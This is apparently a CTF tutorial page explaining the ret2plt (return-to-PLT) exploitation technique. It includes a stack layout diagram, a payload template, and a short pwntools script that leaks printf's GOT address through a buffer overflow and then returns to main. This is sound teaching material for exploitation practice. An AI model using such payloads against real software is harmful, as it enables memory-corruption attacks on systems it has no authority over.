# Ret2plt A **ret2plt** (**return-to-PLT**) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by **redirecting the flow of execution to a function in the Procedure Linkage Table** ([PLT](https://www.ctfrecipes.com/pwn/general-knowledge/plt-and-got)). ## How it works ? In a **ret2plt** attack, the attacker **overwrites the return address**, using [buffer overflow](https://www.ctfrecipes.com/pwn/stack-exploitation/stack-buffer-overflow/basics) or [format string exploit](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak) for example\*\*,\*\* of a function **with the address of a function in the PLT**. When the function returns, the program will jump to the function in the PLT instead of the next instruction in the original code. {% hint style="warning" %} The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example. {% endhint %} ``` address | values ------------+------------------------------------------------------------------- | +------------------------- Buffer ---------------------------+ 0xffffd264: | | 0x41414141 0x41414141 0x41414141 0x41414141 | | +------------------------------------------------------------+ | +- plt addr -+ +-saved eip -+ +--- param --+ | 0xffffd274: | | 0x565561dd | | 0xffffd35c | | 0xffffd12c | 0x00000001 | | +------------+ +------------+ +------------+ | ... | ... ``` In order to make the stack in this state, the following payload must be used : ```bash [buffer overflow needed lenght][plt function() address][any 4 bytes][parameter] ``` ```python from pwn import * elf = ELF('./chall') payload = flat( b'A' * padding, elf.plt['printf'], elf.symbols['main'], elf.got['printf'] ) ``` {% hint style="info" %} In this example, the exploit will call the `printf()` function with the `printf()` address stored in the got as parameter and the execution flaw will return to `main`. {% endhint %}